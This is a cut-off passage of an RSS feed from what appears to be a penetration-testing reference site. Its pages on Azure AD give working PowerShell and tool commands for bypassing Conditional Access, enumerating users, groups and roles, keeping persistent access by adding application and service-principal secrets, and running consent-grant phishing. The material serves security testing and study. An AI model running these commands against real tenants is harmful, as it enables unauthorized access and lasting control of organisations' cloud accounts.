&lt;p&gt;Use Intune Company Portal Client ID (&lt;code&gt;9ba1a5c7-f17a-4de9-a1f1-6178c8d51223&lt;/code&gt;), to run &lt;code&gt;roadrecon&lt;/code&gt; even when there is a device compliance policy. it is a hardcoded and undocumented exclusion in Conditional Access for device compliance and has the &lt;code&gt;user_impersonation&lt;/code&gt; rights on the AAD Graph.&lt;/p&gt;</description></item><item><title>Azure AD - Enumerate</title><link>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-enumeration/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-enumeration/</guid><description>&lt;h2 id="azure-ad---collectors" class="anchored-heading"&gt;Azure AD - Collectors&lt;a class="heading-anchor" href="#azure-ad---collectors" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://msportals.io/"&gt;&lt;strong&gt;Microsoft Portals&lt;/strong&gt;&lt;/a&gt; - Microsoft Administrator Sites&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/dirkjanm/ROADtools"&gt;&lt;strong&gt;dirkjanm/ROADTool&lt;/strong&gt;&lt;/a&gt; - A collection of Azure AD tools for offensive and defensive security purposes&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;roadrecon&lt;/span&gt; &lt;span class="n"&gt;auth&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-access-token&lt;/span&gt; &lt;span class="n"&gt;eyJ0eXA&lt;/span&gt;&lt;span class="p"&gt;...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;roadrecon&lt;/span&gt; &lt;span class="n"&gt;auth&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-prt-cookie&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;primary-refresh&lt;/span&gt;&lt;span class="n"&gt;-token&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;-r&lt;/span&gt; &lt;span class="n"&gt;msgraph&lt;/span&gt; &lt;span class="n"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;1950a258-227b-4e31-a9cf-717495945fc2&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;roadrecon&lt;/span&gt; &lt;span class="n"&gt;gather&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;roadrecon&lt;/span&gt; &lt;span class="n"&gt;gui&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/BloodHoundAD/AzureHound"&gt;&lt;strong&gt;BloodHoundAD/AzureHound&lt;/strong&gt;&lt;/a&gt; - Azure Data Exporter for BloodHound&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="n"&gt;azurehound&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-refresh-token&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;refresh-token&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;list&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-tenant&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;&amp;lt;target-tenant-id&amp;gt;&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-o&lt;/span&gt; &lt;span class="n"&gt;output&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;json&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="n"&gt;azurehound&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;&amp;lt;username&amp;gt;@contoso.onmicrosoft.com&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;&amp;lt;password&amp;gt;&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;list&lt;/span&gt; &lt;span class="n"&gt;groups&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-tenant&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;&amp;lt;tenant&amp;gt;.onmicrosoft.com&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="n"&gt;azurehound&lt;/span&gt; &lt;span class="n"&gt;-j&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;&amp;lt;jwt&amp;gt;&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;list&lt;/span&gt; &lt;span class="n"&gt;users&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-tenant&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;&amp;lt;tenant&amp;gt;.onmicrosoft.com&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/BloodHoundAD/BARK"&gt;&lt;strong&gt;BloodHoundAD/BARK&lt;/strong&gt;&lt;/a&gt; - BloodHound Attack Research Kit&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;.&lt;/span&gt; &lt;span class="p"&gt;.\&lt;/span&gt;&lt;span class="n"&gt;BARK&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;ps1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nv"&gt;$MyRefreshTokenRequest&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;Get-AZRefreshTokenWithUsernamePassword&lt;/span&gt; &lt;span class="n"&gt;-username&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;user@contoso.onmicrosoft.com&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-password&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;MyVeryCoolPassword&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-TenantID&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;contoso.onmicrosoft.com&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nv"&gt;$MyMSGraphToken&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;Get-MSGraphTokenWithRefreshToken&lt;/span&gt; &lt;span class="n"&gt;-RefreshToken&lt;/span&gt; &lt;span class="nv"&gt;$MyRefreshTokenRequest&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;refresh_token&lt;/span&gt; &lt;span class="n"&gt;-TenantID&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;contoso.onmicrosoft.com&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nv"&gt;$MyAADUsers&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;Get-AllAzureADUsers&lt;/span&gt; &lt;span class="n"&gt;-Token&lt;/span&gt; &lt;span class="nv"&gt;$MyMSGraphToken&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;access_token&lt;/span&gt; &lt;span class="n"&gt;-ShowProgress&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/dafthack/GraphRunner"&gt;&lt;strong&gt;dafthack/GraphRunner&lt;/strong&gt;&lt;/a&gt; - A Post-exploitation Toolset for Interacting with the Microsoft Graph API&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Invoke-GraphRecon&lt;/span&gt; &lt;span class="n"&gt;-Tokens&lt;/span&gt; &lt;span class="nv"&gt;$tokens&lt;/span&gt; &lt;span class="n"&gt;-PermissionEnum&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Invoke-DumpCAPS&lt;/span&gt; &lt;span class="n"&gt;-Tokens&lt;/span&gt; &lt;span class="nv"&gt;$tokens&lt;/span&gt; &lt;span class="n"&gt;-ResolveGuids&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Invoke-DumpApps&lt;/span&gt; &lt;span class="n"&gt;-Tokens&lt;/span&gt; &lt;span class="nv"&gt;$tokens&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Get-DynamicGroups&lt;/span&gt; &lt;span class="n"&gt;-Tokens&lt;/span&gt; &lt;span class="nv"&gt;$tokens&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/NetSPI/MicroBurst"&gt;&lt;strong&gt;NetSPI/MicroBurst&lt;/strong&gt;&lt;/a&gt; - MicroBurst includes functions and scripts that support Azure Services discovery, weak configuration auditing, and post exploitation actions such as credential dumping&lt;/p&gt;</description></item><item><title>Azure AD - IAM</title><link>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-devices-users-sp/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-devices-users-sp/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Root Management Group (Tenant) &amp;gt; Management Group &amp;gt; Subscription &amp;gt; Resource Group &amp;gt; Resource&lt;/p&gt;
&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Users (User, Groups, Dynamic Groups)&lt;/li&gt;
&lt;li&gt;Devices&lt;/li&gt;
&lt;li&gt;Service Principals (Application and Managed Identities)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="users" class="anchored-heading"&gt;Users&lt;a class="heading-anchor" href="#users" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;List users: &lt;code&gt;Get-AzureADUser -All $true&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Enumerate groups&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# List groups&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Get-AzureADGroup&lt;/span&gt; &lt;span class="n"&gt;-All&lt;/span&gt; &lt;span class="vm"&gt;$true&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Get members of a group&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Get-AzADGroup&lt;/span&gt; &lt;span class="n"&gt;-DisplayName&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;lt;GROUP-NAME&amp;gt;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Get-AzADGroupMember&lt;/span&gt; &lt;span class="n"&gt;-GroupDisplayName&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;lt;GROUP-NAME&amp;gt;&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;select &lt;/span&gt;&lt;span class="n"&gt;UserPrincipalName&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Enumerate roles: &lt;code&gt;Get-AzureADDirectoryRole -Filter &amp;quot;DisplayName eq 'Global Administrator'&amp;quot; | Get-AzureADDirectoryRoleMember&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;List roles: &lt;code&gt;Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName&lt;/code&gt;&lt;/p&gt;</description></item><item><title>Azure AD - Persistence</title><link>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-persistence/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-persistence/</guid><description>&lt;h2 id="add-secrets-to-application" class="anchored-heading"&gt;Add Secrets to Application&lt;a class="heading-anchor" href="#add-secrets-to-application" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Add secrets with &lt;a href="https://github.com/lutzenfried/OffensiveCloud/blob/main/Azure/Tools/Add-AzADAppSecret.ps1"&gt;lutzenfried/OffensiveCloud/Add-AzADAppSecret.ps1&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt; &lt;span class="n"&gt;C:&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;Tools&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="nb"&gt;Add-AzADAppSecret&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;ps1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Add-AzADAppSecret&lt;/span&gt; &lt;span class="n"&gt;-GraphToken&lt;/span&gt; &lt;span class="nv"&gt;$graphtoken&lt;/span&gt; &lt;span class="n"&gt;-Verbose&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Use secrets to authenticate as Service Principal&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nv"&gt;$password&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;ConvertTo-SecureString&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;lt;SECRET/PASSWORD&amp;gt;&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-AsPlainText&lt;/span&gt; &lt;span class="n"&gt;-Force&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nv"&gt;$creds&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;New-Object&lt;/span&gt; &lt;span class="n"&gt;System&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;Management&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;Automation&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;PSCredential&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;lt;AppID&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$password&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Connect-AzAccount&lt;/span&gt; &lt;span class="n"&gt;-ServicePrincipal&lt;/span&gt; &lt;span class="n"&gt;-Credential&lt;/span&gt; &lt;span class="nv"&gt;$creds&lt;/span&gt; &lt;span class="n"&gt;-Tenant&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;lt;TenantID&amp;gt;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="add-service-principal" class="anchored-heading"&gt;Add Service Principal&lt;a class="heading-anchor" href="#add-service-principal" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Generate a new service principal password/secret&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Import-Module&lt;/span&gt; &lt;span class="n"&gt;Microsoft&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;Graph&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;Applications&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Connect-MgGraph&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nv"&gt;$servicePrincipalId&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;&amp;lt;service-principal-id&amp;gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nv"&gt;$params&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="vm"&gt;@&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;passwordCredential&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="vm"&gt;@&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;displayName&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;NewCreds&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Add-MgServicePrincipalPassword&lt;/span&gt; &lt;span class="n"&gt;-ServicePrincipalId&lt;/span&gt; &lt;span class="nv"&gt;$servicePrincipalId&lt;/span&gt; &lt;span class="n"&gt;-BodyParameter&lt;/span&gt; &lt;span class="nv"&gt;$params&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="add-user-to-group" class="anchored-heading"&gt;Add User to Group&lt;a class="heading-anchor" href="#add-user-to-group" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Add-AzureADGroupMember&lt;/span&gt; &lt;span class="n"&gt;-ObjectId&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;group_id&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;-RefObjectId&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;user_id&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;-Verbose&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="powershell-profile-backdoor-using-kfm" class="anchored-heading"&gt;PowerShell Profile Backdoor Using KFM&lt;a class="heading-anchor" href="#powershell-profile-backdoor-using-kfm" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;OneDrive for Business Known Folder Move (KFM) is a feature in Microsoft OneDrive for Business that enables users and organizations to automatically redirect the contents of key Windows user folders; Desktop, Documents, and Pictures from their local PC to OneDrive.&lt;/p&gt;</description></item><item><title>Azure AD - Phishing</title><link>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-phishing/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-phishing/</guid><description>&lt;h2 id="illicit-consent-grant" class="anchored-heading"&gt;Illicit Consent Grant&lt;a class="heading-anchor" href="#illicit-consent-grant" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;The attacker creates an Azure-registered application that requests access to data such as contact information, email, or documents. The attacker then tricks an end user into granting consent to the application so that the attacker can gain access to the data that the target user has access to.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;:warning: All Office 365 users will be protected from app-based attacks now that publisher verification is generally available as they &amp;ldquo;will no longer be able to consent to new multi-tenant apps registered after November 8th, 2020 coming from unverified publishers&amp;rdquo;.&lt;/p&gt;</description></item><item><title>Azure Services - Application Endpoint</title><link>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-services-application-endpoint/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-services-application-endpoint/</guid><description>&lt;h2 id="enumerate" class="anchored-heading"&gt;Enumerate&lt;a class="heading-anchor" href="#enumerate" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Enumerate possible endpoints for applications starting/ending with PREFIX&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="n"&gt;C:&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;Tools&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Get-AzureADServicePrincipal&lt;/span&gt; &lt;span class="n"&gt;-All&lt;/span&gt; &lt;span class="vm"&gt;$true&lt;/span&gt; &lt;span class="n"&gt;-Filter&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;startswith(displayName,&amp;#39;PREFIX&amp;#39;)&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="p"&gt;%&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nv"&gt;$_&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ReplyUrls&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="n"&gt;C:&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;Tools&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Get-AzureADApplication&lt;/span&gt; &lt;span class="n"&gt;-All&lt;/span&gt; &lt;span class="vm"&gt;$true&lt;/span&gt; &lt;span class="n"&gt;-Filter&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;endswith(displayName,&amp;#39;PREFIX&amp;#39;)&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;Select-Object&lt;/span&gt; &lt;span class="n"&gt;ReplyUrls&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;WwwHomePage&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;HomePage&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="access" class="anchored-heading"&gt;Access&lt;a class="heading-anchor" href="#access" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;https&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;myapps&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;microsoft&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;signin&lt;/span&gt;&lt;span class="p"&gt;/&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;App&lt;/span&gt; &lt;span class="n"&gt;ID&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;&lt;span class="k"&gt;?&lt;/span&gt;&lt;span class="n"&gt;tenantId&lt;/span&gt;&lt;span class="p"&gt;=&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;TenantID&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="references" class="anchored-heading"&gt;References&lt;a class="heading-anchor" href="#references" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.alteredsecurity.com/azureadlab"&gt;Training - Attacking and Defending Azure Lab - Altered Security&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Azure Services - Application Proxy</title><link>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-services-application-proxy/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-services-application-proxy/</guid><description>&lt;h2 id="enumerate" class="anchored-heading"&gt;Enumerate&lt;a class="heading-anchor" href="#enumerate" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
